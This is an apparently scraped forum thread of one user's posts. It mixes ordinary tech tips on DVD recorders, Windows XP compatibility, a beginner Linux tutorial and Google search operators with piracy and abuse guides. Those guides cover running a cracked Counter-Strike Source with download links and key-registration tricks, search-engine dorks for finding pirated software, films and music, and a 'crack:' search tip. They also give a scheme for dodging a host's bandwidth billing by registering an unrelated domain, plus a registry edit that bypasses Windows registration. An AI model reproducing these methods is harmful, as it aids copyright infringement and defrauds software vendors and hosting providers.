When you walk into a store, chances are you won't be able to tell the differences between the slim DVD recorders gracing the shelves--at least, not at a glance. On the outside, they look virtually identical. And the only additional information you might get from the price tag or label is what format the recorder supports and whether it has a hard drive.

Don't stress so much about the formats. No single manufacturer supports all of the formats available; a couple of makers come close (Lite-On, Sony), supporting all but DVD-RAM. The - and + formats are quite similar, and either will get the recording job done.

I've personally observed that the - format discs tend to take longer to initialize and finalize. By longer, I'm talking about anywhere from 5 to 120 seconds, depending upon the unit--enough to be incredibly annoying when you're sitting in front of the TV, your finger eagerly hovering over the record button to start a recording, or the eject button so you can swap discs without missing any action.

If your goal is to record a lot of TV shows, then I can't recommend highly enough a DVD recorder with integrated TiVo service. Humax, Pioneer, and Toshiba all offer such recorders, which combine a hard drive of 80GB or greater with a DVD burner, and, of course, the TiVo service. The full-blown TiVo service costs extra ($299 for the lifetime of the unit, on top of the cost of the recorder) and adds two-week's worth of program guides, a season-pass feature that records all episodes of a show so you never miss your favorites, and artificial intelligence that finds and records programs you might enjoy. (A free limited version of TiVo's software that downloads electronic programming information for the next three days is integrated into these units at no added cost.)

I don't make this recommendation just because of TiVo's personalized recording features and friendly graphical interface. The reason I suggest going this route is that these recorders have an amazing capacity to automatically create navigational menus. All of the program data in TiVo's electronic program guide--as well as TiVo's visual menu navigation structure--conveniently transfers over to any disc you burn.

DVD recorders are typically limited in what they can do to label menus. When you record a disc, you end up with a generically labeled index, with thumbnails for each recording or "title" on the disc, and boring and uninformative labels like "Title 01" (with, perhaps, the time and date added for good measure). TiVo-enabled recorders, in contrast, provide disc menus with the series name, episode title, and even a program summary as well as the date and time of the recording. If you're recording to cheap write-once media, this feature is invaluable. If you're recording to rewritable media--which means you could conceivably edit the menu titles at some point--this capability is still a huge time-saver.

Avid videophiles who don't want to spring for TiVo should look for a DVD set-top unit with a high-capacity hard drive of 80GB or more and high-speed dubbing of at least 8X. So far, I've seen only one recorder with both high-speed dubbing capability and a high-capacity hard drive, but I imagine that more such units will be forthcoming--eventually.

Beware of units that bill themselves as having "high-speed" dubbing: In most cases, the manufacturer is using the term to denote recording speeds of 2X or 4X from the hard drive to DVD. Furthermore, some vendors are coming up with absurd-sounding dubbing speeds--for example, 32X, a number they derive based on how many hours' worth of recordings you can fit on a disc (8 hours at the lowest-quality recording mode), and the speed of the burner (4X in my example).

Where to start your search? I recommend browsing PC World's latest "Top 10 DVD Drives" chart:

Only the registered members can see the link


2. Allow Extra Time

If you're preparing to record a program, budget a few extra minutes to get the unit ready. Believe me, the seconds add up--as I learned during my recording marathon of the Athens Olympiad. You need to factor in up to 30 seconds for the recorder to boot, about 10 to 20 seconds for the disc to spin up, and at least another 30 to 45 seconds for the recorder to prepare the disc for recording (your unit might say "initialize" or "format"). That's all before you can hit Record.

And when you're through recording, expect to wait 30 to 60 seconds to regain control of the recorder after you hit Stop. With some models, the delay occurs after you hit Eject. Either way, that delay could mean you'll miss the beginning of the next gymnast's routine--and none of this takes into account disc finalization, which can take another 30 seconds to 3 minutes, depending upon the disc's format and how much of it you've used.

3. Finalize, Finalize, Finalize

Disc finalization is the process that closes the disc so it can be read in other devices, such as a DVD player, DVD recorder, or DVD-ROM drive. It's also a process that bites. There, I've said it.

Finalization is the dirty little secret of DVD recorders: It's a time-consuming extra step that users of the venerable VCR don't expect. And it requires more effort than it should, due to poor menu design on DVD recorders. I've yet to see a recorder that makes this step truly easy--all of them bury it under a setup or menu item, and all of them require far too many clicks and layers considering this is a N-E-C-E-S-S-A-R-Y step for every write-once DVD-R or DVD+R you burn.

I recommend finalizing your disc as soon you're through recording. Due to quality issues, you'll likely record only a maximum of 2 hours of television per disc, which means that no more than two weeks will pass between finalization sessions. This way, when you go back to a recorded disc, it will be ready to play in any DVD player--whether it's the $30 Costco special in your bedroom or your laptop's DVD-ROM drive.

Caution: You might think you don't need to finalize if you don't have more than one DVD player or drive, and you plan on playing your DVD on your own recorder only. But what happens when, inevitably, you upgrade your recorder to a swankier, newer model? Or, even worse, when the model you're using now isn't working five years down the line? Then what? You'll be left with a library full of unreadable discs. Although you might be able to recover the raw video data from an unfinalized disc using a program like Infinadyne's CD/DVD Diagnostic, the process is tedious and time-consuming. Also, don't count on scavenging a backup unit off EBay in a few years: As I've learned, discs may not be interchangeable, even between two recorder decks bearing the same model number from the same manufacturer.

4. Don't Abuse Your Discs

It's easy to leave discs out of their cases, lying around or stacking up as you swap 'em out for a new one. But avoid that temptation--the dust will damage your discs, and you increase the chances of accidental scratches and scuffs.

Also, avoid leaving your recorded DVDs near a sunny window. The disc's dye layer is susceptible to light and heat; if either affects the disc, its data may become unreadable.

Finally, clean your discs carefully. Use a lint-free cloth, compressed air, or a liquid cleanser intended for use with DVD media. Dust and other airborne particles can scratch your disc, which could result in data loss. When cleaning with a lint-free cloth, stroke from the inside of the hub to the outside of the disc. Never use a circular motion from the inside out; and never use a tissue, paper towel, or other random rag.

For more on how to treat your discs, read
"Ten Tips for Durable DVDs":

Only the registered members can see the link


5. Choose Your Media--and Labels--Wisely

A cheap spindle of media is tempting, but then you have to buy cases separately. And what cases to buy? Small plastic jewel cases? DVD movie-size cases? The combinations can be frustrating, at best.

Spindles are indeed affordable, but don't buy them without buying cases, too--and keep both stashed near your TV and DVD recorder setup, so you can easily grab a disc from the recorder and place it into its case. Otherwise, it's way too easy for stacks of discs to pile up--a no-no, as I note in tip 4.

Also, consider buying discs that come in oversized movie-style plastic cases. You'll pay a little more, but the convenience is worth it. Plus, you'll get a cardstock insert that you can use to create handwritten labels. If you get a high-speed dubbing unit, make sure you buy media that matches the recorder's speed.

If you do buy spindle media, keep in mind that the cases you buy in bulk may not have an insert on which you can scribble. If the case lack inserts, improvise with a piece of letter-size paper, folded over or cut up to fit accordingly. Spend a little more money, and you can get cardstock inserts.

There are a host of labeling software options out there to help you craft your labels. Read the following two "Burning Questions" columns for a comprehensive review of the subject:

"The Joy of Labeling":

Only the registered members can see the link


"Is Labeling Software Worth the Hassle?":

Only the registered members can see the link


But all of these options are going to require you to move your labeling operation over to the PC--something that may not work into your recording work flow.

Other PC-based labeling options include printable media that you can use with an inkjet printer. I'd stay away from adhesive labels, though: They're difficult to apply evenly, and could cause problems if the disc is poorly manufactured.

If you're trying to keep your labeling efforts nearer to your TV, I'd suggest using water-based pens to write on the discs, and on the label inserts, too, while you're at it. Another possibility: If your handwriting is barely better than chicken scrawl, then it's worth buying a battery-operated labeler, such as those offered by Brother or Casio. Both companies offer half-inch-wide labels that fit well along the spine of a DVD movie case.

Master
29-04-07, 09:41
Found out a really cool way to get cool music without p2p progs or Only the registered members can see the link sites.Best thing of all:NO QUEUES,NO PASSWORDS...
Here it is:
1.Get Yahoo Messenger [BETA] here:
CODE
Only the registered members can see the link

2.Wait for it to download,then run it and let it download another 5 MB or so.
3.Get FairStar MP3 Recorder here:
CODE
Only the registered members can see the link

After testing Total Recorder and another prog,the FairStar product is the best RECORDING MP3s from a source,in our case the INTERNET RADIO.
4.Fire up LAUNCHcastRadion in Yahoo Messenger [BETA] and choose a station or a genre.
5.Start up FairStart MP3 Recorder,go to Record Options and CHECK autosetting,go to Encoder-MP3 and UN-CHECK enable VBR and choose 128 or 192 KBs.Also make sure you choose your OUTPUT folder and you're done.
6.Hit record or whatever and awaaaaaay you go.
More soon...

Master
29-04-07, 09:41
Get unlimited bandwidth from your host for free


NOTE: This applies only to specific hosting companies, due to the
specific setup needed and does have its drawbacks.

While setting up hosting space with a specific company I often deal
with, I noticed that they used a shared IP. (IP shared by two or more
websites/domains.) Well, the rates for unlimited bandwidth were
around $50+ per month, which I found unreasonable. I didnt require
much space, and didnt want to be limited to a mere 3 gig of traffic
per month.

Back on track... When setting up the acct, the hosting company needs
to know the domain name so that they can direct it accordingly.
(example: 'Only the registered members can see the link ,
'Only the registered members can see the link etc)

At this point you can give a url that doesnt belong to you at all. As
long as the nameservers dont change, that should have absolutly no
negative effects on you or your site whatsoever.

How it works is this:
The host propogates you a certain amount space on its servers, and
monitors the traffic that enters their space through the domain its
registered under. Being that the domain isn't connected to the site
at all, it registers ZERO traffic.

Zero traffic registered = can't possibly go over bandwidth
restrictions
can't possibly go over bandwidth restrictions = free unlimited
bandwidth

Now the problems with this (besides the ethical ones) is that your
host may offer X amount of mail addys with the acct
(you@y...) and these will not work, as the name isnt on their
DNS. However, some domain companies allow you to set it up
regardless. Another problem seems to be strictly cosmetic, but can be
highly problematic... Once you attach the domain you want onto the
site, each page comes up/w the ip/UN the host propagated to your
acct. Its at this point where you have to have a phenominal 10-15
character alphanumerical or better (#, &, etc) pw, or your site will
be vulnerable to attack since the attacker already has your UN. This
only gives attackers a slight advantage as the amount of time it
would take to brute force a 10 character pw @ a rate of 1,000,000 per
second is 10 years. Add numbers and case sensitivity to that and it
becomes approx 26,980 years.

While I'm on it, I may as well add that if you use this method,
obviously you are going to be using the lowest cost hosting plan
available, which in turn will offer the least amount of space. Thats
why free hosts were invented.

Free hosts suck as a general rule. Who wants a site smothered in ads?
However, if you upload all your programs, graphics and other large
files (have a backup of course) to a reliable free host and target
them accordingly from your site you have just freed up a signifigant
amount of space. The only setback/w this is having to keep an index
card or file around/w your pws, as you should never use the same one
twice, and want to use complicated ones.

Master
29-04-07, 09:42
Getting Counter-Strike Source to work

Step 1- Download cssource_notcracked_beta_emporio.rar, cssource_cracked_emporio.rar and cssource_updates_emporio.rar (make sure this update is V2).

Step 2- Extract cssource_notcracked_beta_emporio.rar to a folder (for this example we will use E:/CS: Source*), then extract cssource_cracked_emporio.rar to E:/CS: Source*(overwrite all files) and finally extract cssource_updates_emporio.rar(V2) to E:/CS: Source* (overwrite all files).

Step 3- Make a NEW steam account(We will use Bob1g2** for this example).

Step 4- Now here comes the tricky part. After you have made a NEW steam account, get any counter strike: condition zero key (and no i won't tell you one) off the internet. Launch steam and click on Condition Zero in the Avaible Games list. Click on Register this product and click next. Once you get to the point where it says, "Steam is processing you request" open up Task Manager (Ctrl, Alt, Delete at the same time) and click on steam.exe and once the steam window has 1 bar that is yellow, click terinate process on the task manager.

Step 5- Open up steam again and check if Condition Zero is in your My Games list. If it isn't then repeat Step 3 using a different key untill you get Condition Zero is your My Games list. Once you get it in your My Games list then, download Codename Gordon and once it has finished downloading, launch it. Once you get into the menu, then click exit.

Step 6- Go into the folder where you installed steam and copy ClientRegistry.blob into the folder where you installed CS: Source.

Step 7- Go into the folder where you installed CS: Source and open up SteamApp.cfg.

Step 8- Once you have opened up SteamApp.cfg, edit it so it only has this in it:

CODE

SteamAppId=10
#SteamAppVersionId=0
SteamInstallPath="E:/CS: Source*"
# [as is clearified later on, this should be your email address:]
#SteamAppUser=aalb002@cafe.boomtown.net
SteamAppUser=Bob1g2**


Make sure you change the Bob1g2** bit to the new steam account you created and the E:/CS: Source* to where you installed counter-strike source.

Step 9- Make a sortcut of hl2.exe with these in the sortcut(without the quotes) "-steam -game cstrike"

*Change this to where you installed CS: Source.
**Change this to your new steam account.

Downloads

cssource_notcracked_beta_emporio.rar- fxp://cs.rivera.ru/games/Counter-Strike/CS_Source/client/cssource_notcracked_beta_emporio.rar

cssource_cracked_emporio.rar- fxp://cs.rivera.ru/games/Counter-Strike/CS_Source/client/V2/cssource_cracked_emporio.rar

cssource_updates_emporio.rar(v2)- fxp://cs.rivera.ru/games/Counter-Strike/CS_Source/client/V2/cssource_updates_emporio.rar

Limit is 100 users max

Other things you should know

Don't download the V3 update since that doesn't work yet.

If you get a error saying that you are not subscribed, then do steps 4-6 to make it work again.

If you get unable to set mode then do this:
go to your registry -> HKEY_CURRENT_USER\Software\Valve\Source\Settings -> look up the entry "ScreenRefreshRate" -> doubleclick -> type your favourite monitor hz value into the field (i.e. 100hz, if your monitor can handle it) -> change the base setting from hexadecimal to decimal -> finished. (excerpt taken from flinkerhamster tutorial)

Some Servers

1. 66.199.235.42:27014

2. 24.141.2.86

These servers have being tested by me and are working.

Master
29-04-07, 09:43
okay lets keep this tutorial short. you want movies and games/mp3 / games and dont' know where to get them, thank god there is google.com
goto Only the registered members can see the link

put this string in

"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

notice that iam only changing the word after the parent directory, change it to what you want and you will get lots of goods. i got plenty of movie sites heh.

Master
29-04-07, 09:43
Most programs run properly on Windows XP. The exceptions are some older games and other programs that were written specifically for an earlier version of Windows. To run your program on Windows XP, you can try the following, Run the Program Compatibility Wizard. As an alternative, you can set the compatibility properties manually. Update your program, drivers, or hardware. These options are covered in detail below.

The Program Compatibility Wizard
This wizard prompts you to test your program in different modes (environments) and with various settings. For example, if the program was originally designed to run on Windows 95, set the compatibility mode to Windows 95 and try running your program again. If successful, the program will start in that mode each time. The wizard also allows you to try different settings, such as switching the display to 256 colors and the screen resolution to 640 x 480 pixels. If compatibility problems prevent you from installing a program on Windows XP, run the Program Compatibility Wizard on the setup file for the program. The file may be called Setup.exe or something similar, and is probably located on the Installation disc for the program. To run the Program Compatibility Wizard click Start, click Help and Support, click Find compatible hardware and software for Windows XP, and then, under See Also in the navigation pane, click "Program Compatibility Wizard."

Set the compatibility properties manually
As an alternative to running the Program Compatibility Wizard, you can set the compatibility properties for a program manually. The settings are the same as the options in the Program Compatibility Wizard. To set the compatibility properties for a program manually Right-click the program icon on your desktop or the shortcut on the Start menu for the program you want to run, and then click Properties. Click the Compatibility tab, and change the compatibility settings for your program.

The Compatibility tab is only available for programs installed on your hard drive. Although you can run the Program Compatibility Wizard on programs or setup files on a CD-ROM or floppy disk, your changes will not remain in effect after you close the program. For more information about an option on the Compatibility tab, right-click the option and then click "What's This."

Update your program or drivers
If your program does not run correctly after testing it with the Program Compatibility Wizard, check the Web for updates or other fixes, as follows:

Check the Web site of the program's manufacturer to see if an update or patch is available.
Check Windows Update to see if a fix is available for the program.
Click Home on the menu bar of Help and Support Center, then click Windows Update in the right pane.

If the program is a game that uses DirectX, ensure that you are using the latest version of DirectX. In addition, check the Web site of the manufacturer of your video card or sound card to see if newer drivers are available for either of them.

Master
29-04-07, 09:43
I. What is Linux?
II. Trying it out
III. Installing
IV. What to do now
V. The Console

Intro:
This tutorial is written with the total Linux n00b in mind.
I've seen too many n00bs get totally left in the dark by asking what
the best distro is. They seem to only get flooded with too many
answers in so short a time. I'm a little bit of a n00b too, so I know
how it feels. I will cover a grand total of two basic distros. You may
learn to strongly prefer other ones (I do!) but this is just to get
you started. I touch on a number of topics that would be impossible to
go into in depth in one tutorial, so I encourage you to actively seek
out more about the concepts I make reference to.


I. What is Linux?

Linux is basically an operating system (OS for short). The Windows
machine you're (probably) using now uses the Mcft Windows
operating system.

Ok, so what's so different about Linux?

Linux is part of a revolutionary movement called the open-source
movement. The history and intricacies of that movement are well beyond
the scope of this tutorial, but I'll try and explain it simply. Open
source means that the developers release the source code for all their
customers to view and alter to fit what they need the software to do,
what they want the software to do, and what they feel software should
do. Linux is a programmer?s dream come true, it has the best compilers,
libraries, and tools in addition to its being open-source. A
programmer's only limit then, is his knowledge, skill, time, and
resolve.

What is a distro?

A distro is short for a distribution. It's someone's personal
modification or recreation of Linux.

What do you mean by distros? I just want Linux!

Since Linux is open source, every developer can write his own version.
Most of those developers release their modifications, or entire
creations as free and open source. A few don't and try to profit from
their product, which is a topic of moral debate in the Linux world.
The actual Linux is just a kernel that serves as a node of
communication between various points of the system (such as the CPU,
the mouse, the hard drive etc.). In order to use this kernel, we must
find a way to communicate with it. The way we communicate is with a
shell. Shells will let us enter commands in ways that make sense to
us, and send those commands to the kernel in ways that makes sense to
it. The shell most Linux's use it the BASH shell (Bourne Again SHell).
The kernel by itself will not do, and just a shell on top of the kernel
won?t either for most users; we are then forced to use a distribution.

What distro is best?

This is not the question you want to ask a large number of people at
one time. This is very much like asking what kind of shoe is best,
you'll get answers anywhere from running shoes, hiking boots, cleats,
to wingtips. You need to be specific about what you plan on using
Linux for, what system you want to use it on, and many other things. I
will cover two that are quick and easy to get running. They may not be
the best, or the quickest, or the easiest, or the most powerful, but
this is a guide for getting started, and everyone has to start
somewhere.

How much does it cost?

computer + electricity + internet + CD burner and CDs = Linux
I'll let you do your own math.
Note however that a few do charge for their distros, but they aren't
all that common, and can be worked around. Also, if you lack internet
access or a CD burner or CDs or you just want to, you can normally
order CDs of the distro for a few dollars apiece.



II. Trying it out.

Wouldn't it stink if you decide to wipe out your hard drive and install
Linux as the sole operating system only to learn that you don't know
how to do anything and hate it? Wouldn?t it be better to take a test
drive? 95 out of a 100 of you know where I'm heading with this section
and can therefore skip it. For those of you who don't know, read on.

There are many distros, and most distros try to have something that
makes them stand out. Knoppix was the first live-CD distro. Although
most of the other main distros have formed their own live-CDs, Knoppix
is still the most famous and I will be covering how to acquire it.

A live-CD distro is a distribution of Linux in which the entire OS can
be run off of the CD-ROM and your RAM. This means that no installation
is required and the distro will not touch your hard disk or current OS
(unless you tell it to). On bootup, the CD will automatically detect
your hardware and launch you into Linux. To get back to Windows, just
reboot and take the CD out.

Go to the Knoppix website (Only the registered members can see the link). Look around some to get
more of an idea on what Knoppix is. When you're ready, click Download.
You'll be presented with a large amount of mirrors, some of which have
ftp and some of which have http also.

note: the speed of the mirrors vary greatly, and you may want to
change mirrors should your download be significantly slow.

Choose a mirror. Read the agreement and choose accept. You'll probably
want to download the newest version and in your native language (I'll
assume English in this tutorial). So choose the newest file ending in
-EN.iso

note: you might want to also verify the md5 checksums after the
download, if you don't understand this, don't worry too much. You just
might have to download it again should the file get corrupted (you'll
have to anyway with the md5). Also, a lot of times a burn can be
botched for who-knows what reason. If the disk doesn?t work at all,
try a reburn.

Once the .iso file is done downloading, fire up your favorite
CD-burning software. Find the option to burn a CD image (for Nero, this
is under copy and backup) and burn it to a disk. Make sure you don't
just copy the .iso, you have to burn the image, which will unpack all
the files onto the CD.

Once the disk is done, put it in the CD-ROM drive and reboot the
computer. While your computer is booting, enter CMOS (how to get to
CMOS varies for each computer, some get to it by F1 or F2 or F3, etc.)
Go to the bootup configuration and place CD-ROM above hard disk. Save
changes and exit. Now, Knoppix will automatically start. You will be
presented with a boot prompt. Here you can input specific boot
parameters (called cheatcodes), or just wait and let it boot up using
the default.

note: Sometimes USB keyboards do not work until the OS has somewhat
booted up. Once you?re actually in Knoppix, your USB keyboard should
work, but you may not be able to use cheatcodes. If you need to,
attach a PS/2 keyboard temporarily. Also, if a particular aspect of
hardware detection does not work, look for a cheatcode to disable it.
Cheatcodes can be found on the Knoppix website in text format (or in
HTML at Only the registered members can see the link).

Upon entering the KDE desktop environment, spend some time exploring
around. Surf the web, get on IM, play some games, explore the
filesystem, and whatever else seems interesting. When your done, open
up the console (also called terminal, xterm, konsole, or even shell)
and get ready for the real Linux. See section V for what to do from
here.

note: to function as root (or the superuser) type su.


It's not entirely necessary that you are a console wizard at this point
(although you will need to be sooner or later), but a little messing
around wont hurt.

Just as there are many Linux distros, so there are also many types of
Knoppix. I won?t go into using any of them, but they should all be
somewhat similar. Some of them include: Gnoppix, Knoppix STD, Morphix,
and PHLAK. Other distros also have live-CDs.

III. Installing

I will guide you through the installation of Fedora Core 2. The reason
I chose Fedora is because it contains the Anaconda installer, which is
a very easy installer.

Download the discs from here:
Only the registered members can see the link
If the link doesn?t work, then go to Only the registered members can see the link and navigate your
way to downloading Fedora (odds are your architecture is i386).
You will want to download the FC2-i386-disc1.iso and burn it using the
method for Knoppix. Do the same for all the discs.

Note: do NOT download the FC2-i386-SRPMS-disc1.iso files.

Now, once you?re ready, insert disc 1 into the drive and reboot.

The installer should come up automatically (if not, then see the
Knoppix section on CMOS).

Note: installer may vary depending on version. Follow directions best
you can using your best judgement.

1. Language: choose English and hit enter
2. Keyboard: choose us (probably) and hit enter
3. Installation media: choose local CDROM (probably) and hit enter
4. CD test: you can choose to test or skip
5. Intro: click next
6. Monitor: choose your monitor to the best of your ability, if you?re unsure, choose on of the generic ones
7. Installation type: choose which ever you want (default should be fine)
8. Partition: choose to automatically partition (unless you know what you?re doing)
9. Partition: the default partitions should suffice
10. Boot loader: choose your boot loader (grub for default)
11. Network settings: choose the correct settings for your network (generally, don?t mess with anything unless you know what you?re doing)
12. Firewall: you can choose a firewall if you want to
13. Language support: choose any additional language support you want
14. Time zone: pick your time zone
15. Root password: set your root password (root is the admin, or superuser; you want it to be very secure)
16. Packages: choose which packages you want to install. For hard drives over 10 gigs, you can go ahead and choose all
packages (depending on how much disk space you plan on taking up later, note that most everything you?ll need is a package: the exception
being large media files). You will generally want to install all the packages you think you?ll ever need. Two desktop environments aren?t necessary.
Make sure you have at least one and the X window system! (if you want a GUI that is). I suggest you get all the servers too.

Note: Knoppix uses the KDE Desktop environment

17. Make sure everything is all right, and install
18. You can create a boot disk if you want

Note: Desktop environments might have a set-up once you enter them

IV What to do now

Now that you have a Linux set-up and running, there are many paths you
can head down. First, you should explore your GUI and menus. Browse
the web with Mozilla, get on IM with GAIM, play games, add/delete
users, check out OpenOffice, and anything else that might be part of
your daily use. Also, set up a few servers on your computer to play
around with, specifically SMTP (*wink*wink*), FTP (vsftp is a good
one), and either telnet or SSH (OpenSSH is a good one). The setup and
use of these are beyond the scope of this tutorial, but researching
them could prove to be very educational.

The filesystem
The Linux (and Unix) filesystem is different from the normal Windows
that you?re used to. In Windows, your hard drive is denoted ?C:\? (or
whatever). In Linux, it is called the root directory and is denoted
?/?. In the / directory, there are several default folders, including
dev (device drivers) mnt (mount) bin (binaries) usr (Unix System
Resources) home, etc, and others. I encourage you to explore around
the whole file system (see section V) and research more.

Once you are well situated, it?s time to get into the heart and power
of Linux: the console. The next session will guide you through it and
set you on the path to finding out how to do stuff for yourself. You
will (probably) want to start learning to rely less and less on the
GUI and figure out how to do everything through the console (try
launching all your programs from the console, for example).

V. The Console

The Console might look familiar to DOS if you?ve ever used it. The
prompt should look something like the following:

AvatharTri@localhost avathartri$

With the blinking _ following it. This can vary greatly as it is fully
customizable. Let?s get started with the commands.

First, let?s explore the file system. The command ls will "list" the
files in the current directory. Here?s an example:

AvatharTri@localhost avathartri$ ls

It should then display the contents of the current directory if there
are any. Almost all commands have options attached to them. For
example, using the -l option, which is short for "long" will display
more information about the files listed.

AvatharTri@localhost avathartri$ ls -l

We will get into how to find out the options for commands and what
they do later.

The second command to learn will be the cd command, or "change
directory". To use it, you type cd followed by a space and the
directory name you wish to go into. In Linux, the top directory is /
(as opposed to C:\ in Windows). Let?s get there by using this command:

AvatharTri@localhost avathartri$ cd /
AvatharTri@localhost /$

Now, we are in the top directory. Use the ls command you learned
earlier to see everything that?s here. You should see several items,
which are directories. Now, let?s go into the home directory:

AvatharTri@localhost /$ cd home
AvatharTri@localhost home$

And you can now ls and see what?s around. In Linux there are some
special symbol shortcuts for specific folders. You can use these
symbols with cd, ls, or several other commands. The symbol ~ stands
for your home folder. One period . represents the directory your
currently in. Two periods .. represent the directory immediately above
your own. Here?s an example of the commands:

AvatharTri@localhost home$ cd ~
AvatharTri@localhost avathartri$

This moved us to our user?s personal directory.

AvatharTri@localhost avathartri$ cd .
AvatharTri@localhost avathartri$ cd ..
AvatharTri@localhost home$

The cd .. moved us up to the home directory.
As you?ve probably noticed by now, the section behind the prompt
changes as you change folders, although it might not always be the
case as it?s up to the personal configuration.

You can use these symbols with the ls command also to view what is in
different folders:

AvatharTri@localhost home$ ls ~
AvatharTri@localhost home$ ls ..

And you can view what is in a folder by specifying its path:

AvatharTri@localhost home$ ls /
AvatharTri@localhost home$ ls /home

The last command we will cover as far as finding your way around the
filesystem is the cat command. The cat command will show the contents
of a file. Find a file by using the cd and ls commands and then view
its contents with the cat command.

AvatharTri@localhost home$ cd [directory]
AvatharTri@localhost [directory]$ ls
AvatharTri@localhost [directory]$ cat [filename]

Where [directory] is the directory you want to view and [filename] is
the name of the file you want to view. Omit the brackets. Now, if the
file you viewed was a text file, you should see text, but if it wasn?t,
you might just see jumbled garbage, but this is ok. If the file goes
by too fast and goes off the screen, don?t worry, we will get to how
to scroll through it later.

One of the most useful commands is the man command, which displays the
"manual" for the command you want to know more about. To learn more
about the ls command:

AvatharTri@localhost home$ man ls

And you will see the manual page for ls. It displays the syntax, a
description, options, and other useful tidbits of information. Use the
up and down arrows to scroll and press q to exit. You can view the
manual pages for any command that has one (most commands do). Try this
out with all the commands that you know so far:

AvatharTri@localhost home$ man cd
AvatharTri@localhost home$ man cat
AvatharTri@localhost home$ man man

One very crucial option to the man command is the -k option. This will
search the descriptions of manual pages for the word you specify. You
can use this to find out what command to do what you need to do. For
example, let?s say we want to use a text editor:

AvatharTri@localhost home$ man -k editor

And you should see a list of apps with a short description and the
word "editor" in the description.

With a blank prompt, you can hit tab twice for Linux to display all
the possible commands. For Linux to display all the commands beginning
with a certain letter or series of letters, type those letters and hit
tab twice.

Note: This is actually a function of BASH and not Linux, but BASH is
the default Linux shell.

Now that you know a little about moving around the filesystem and
viewing manual pages, there is one more trick that we will cover to
help you out. Remember how the man pages were scrollable as in you
could use the arrow keys to scroll up and down? That is because the
man pages use something called the less pager. We?re not going to go
into what this does exactly and how it works, but that?s definitely
something that you will want to look up. Here?s how to use the less
pager with a file:

AvatharTri@localhost home$ cat [filename] | less

That uses something called a pipe. The line is the vertical line above
enter on your keyboard. Briefly, what this does is take the output
from the cat command, and stick it in the less pager. By doing this,
you can view files that would normally run off the screen and scroll
up and down.

Some final commands to check out:

mkdir - make directories
cp - copy file
mv - move file
rm - remove file
rmdir - remove directory
grep - search a file for a keyword
pwd - display current working directory
top - display system resources usage (kill the program with control + c)

Master
29-04-07, 09:44
Would you like to use the Windows Update feature without being forced to register with Microsoft? OK then, this is what you can do:

Launch good ol' Regedit.
Go down to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion.
Look for a value named RegDone. If it isn't there create a new value with that name.
Right click the new value and choose Modify. Make the value 1.
Close Regedit and
Enjoy!

Master
29-04-07, 09:44
just type crack: app name

example: crack: flashget 1.6a


Only the registered members can see the link

Master
29-04-07, 09:45
Google secrets

--------------------------------------------------------------------------------

method 1
?ww.google.com

put this string in google search:

"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

Notice that i am only changing the word after the parent directory, change it to what you want and you will get a lot of stuff.

voila!

method 2
?ww.google.com

put this string in google search:

?intitle:index.of? mp3

You only need add the name of the song/artist/singer.
Example: ?intitle:index.of? mp3 jackson

Master
29-04-07, 09:45
==================================================
Utilizing search engines
==================================================

So much information is on the web, its mind boggling. Thankfully we have search
engines to sift through them and catagorize them for us. Unfortunatly, there is still so
much info that even with these search engines, its often a painstakingly slow process
(something comparable to death for a hacker) to find exactly what you're looking for.

Lets get right into it.

I use google.com as my primary search engine because it presently tops the charts as far as
the sites that it indexes which means more pertinent info per search.

1. Page translation.
Just because someone speaks another language doesn't mean they dont have anything useful to say. I use translation tools like the ones found at

Only the registered members can see the link
and

Only the registered members can see the link
to translate a few key words I am searching for. Be specific and creative because these tools arent the most accurate things on the planet.

2. Directories.
These days everything is about $$$. We have to deal/w SEO (search engine optimization) which seems like a good idea on paper until you do a search for toys and get 5 pornsites in the first 10 results. Using a sites directory will eliminate that. You can narrow your search down easily by looking for the info in specific catagories. (PS google DOES have directories, they're at: directory.google.com)

3. Here are some tips that google refers to as "advanced"

A. "xxxx" / will look for the exact phrase. (google isnt case sensitive)
B. -x / will search for something excluding a certain term
C. filetype:xxx / searches for a particular file extention (exe, mp3, etc)
D. -filetype:xxx / excludes a particular file extention
E. allinurl:x / term in the url
F. allintext:x / terms in the text of the page
G. allintitle:x / terms in the html title of that page
H. allinanchor:x / terms in the links

4. OR
Self explanatory, one or the other... (ie: binder OR joiner)

5. ~X
Synonyms/similar terms (in case you can't think of any yourself)

6. Numbers in a range.
Lets say you're looking for an mp3 player but only want to spend up to $90. Why swim through all the others? MP3 player $0..$90 The 2 periods will set a numeric range to search between. This also works with dates, weights, etc

7. +
Ever type in a search and see something like this:
"The following words are very common and were not included in your search:"
Well, what if those common words are important in your search? You can force google to search through even the common terms by putting a + in front of the denied word.

8. Preferences
It amazes me when I use other peoples PCs that they dont have their google search preferences saved. When you use google as much as I do, who can afford to not have preferences? They're located on the right of the search box, and have several options, though I only find 2 applicable for myself...
A. Open results in new browser
B. Display 10-100 results per page. (I currently use 50 per page, but thats a resolution preference, and 5X's the default)

9. *
Wildcard searches. Great when applied to a previously mentioned method. If you only know the name of a prog, or are looking for ALL of a particular file (ie. you're DLing tunes) something like *.mp3 would list every mp3.

10. Ever see this?
"In order to show you the most relevant results, we have omitted some entries very similar to the X already displayed. If you like, you can repeat the search with the omitted results included." The answer is YES. yes yes yes. Did I mention yes? I meant to.

11. Search EVERYWHERE
Use the engine to its fullest. If you dont find your answer in the web section, try the group section. Hell, try a whole different search engine. Dont limit yourself, because sometimes engines seem to intentionally leave results out.
ex. use google, yahoo, and altavista. search the same terms... pretty close, right? Now search for disney death. Funny, altavista has plenty of disney, but no death...hmmm.

